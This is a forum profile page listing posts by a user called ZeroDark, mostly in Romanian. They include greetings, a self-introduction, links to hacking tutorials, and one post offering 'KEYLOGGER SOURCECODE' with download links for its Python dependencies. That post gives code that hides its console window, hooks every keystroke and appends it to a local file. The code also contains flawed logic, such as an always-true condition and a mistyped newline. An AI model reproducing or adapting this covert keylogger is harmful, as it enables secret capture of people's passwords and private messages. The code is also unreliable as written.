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Everything posted by ZeroDark

  1. http://www.youtube.com/watch?v=od1RUvCB9pc
  2. ZeroDark

    About me...

  3. Welcome >.<
  4. Tinkernut.com|Watch. Learn. Share si aici ceva hack xD Tinkernut.com|Archive|Hacks Nu fac reclama
  5. Sper ca am postat bn daca nu rog sa se mute KEYLOGGER SOURCECODE AND - Download Python:Python Programming Language – Official Website - Download Pyhook: pyhook.sourceforge.net - Download Python for Windows Extensions: Python for Windows extensions | Download Python for Windows extensions software for free at SourceForge.net SOURCE: import win32api import win32console import win32gui import pythoncom, pyHook win = win32console.GetConsoleWindow() win32gui.ShowWindow(win,0) def OnKeyboardEvent(event):    if event.Ascii==5:        _exit(1)    if event.Ascii != 0 or 8:        f=open('c:output.txt','r')        buffer=f.read()        f.close()        f=open('c:output.txt','w')        keylogs=chr(event.Ascii)        if event.Ascii==13:            keylogs='/n'        buffer += keylogs        f.write(buffer)        f.close() hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
  6. ZeroDark


    Bine ai venit !!
  7. ZeroDark


    da ms nu am obs am corectat
  8. ZeroDark


    Salut , Bine v-am gasit!! ZeroDark 18 ani Bucuresti Limbaje de programare care le-am studiat:Java,php,c++,perl. Am studiat mai multe dar astea le stiu si nu are rost sa le pun pe cele care le cunosc foarte putin .
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